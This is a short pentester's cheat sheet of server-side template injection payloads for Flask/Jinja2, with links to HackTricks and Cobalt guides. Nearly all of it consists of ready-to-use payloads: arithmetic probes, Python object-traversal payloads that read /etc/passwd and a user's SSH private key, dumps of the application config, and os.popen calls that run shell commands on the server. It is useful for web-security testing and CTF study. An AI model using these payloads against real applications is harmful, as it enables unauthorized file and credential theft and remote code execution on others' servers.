Flask

SSTI (Server Side Template Injection)

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti

(PHP):
{{7*7}}

(PHP):
{{7*'7'}}

Flask/Jinja2:
#''.__class__.__mro__[2].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }}
# https://github.com/pallets/flask/blob/master/src/flask/helpers.py#L398
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}

Flask/Jinja2:
#''.__class__.__mro__[2].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/home/user/.ssh/id_rsa').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }}
# https://github.com/pallets/flask/blob/master/src/flask/helpers.py#L398
{{ get_flashed_messages.__globals__.__builtins__.open("/home/user/.ssh/id_rsa").read() }}

#URL Based Enumeration JinJa2

http://10.0.0.1/{{config.items()}}
http://10.0.0.1/{{config.from_object('os')}}

{{get_flashed_messages}}
{{get_flashed_messages.__class__.__mro__[1].__subclasses__()}}

{{"foo".upper()}}

{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

{{request.application.__globals__.__builtins__.__import__('os').popen('ls *').read()}}

{{request.application.__globals__.__builtins__.__import__('os').popen('cat file.txt').read()}}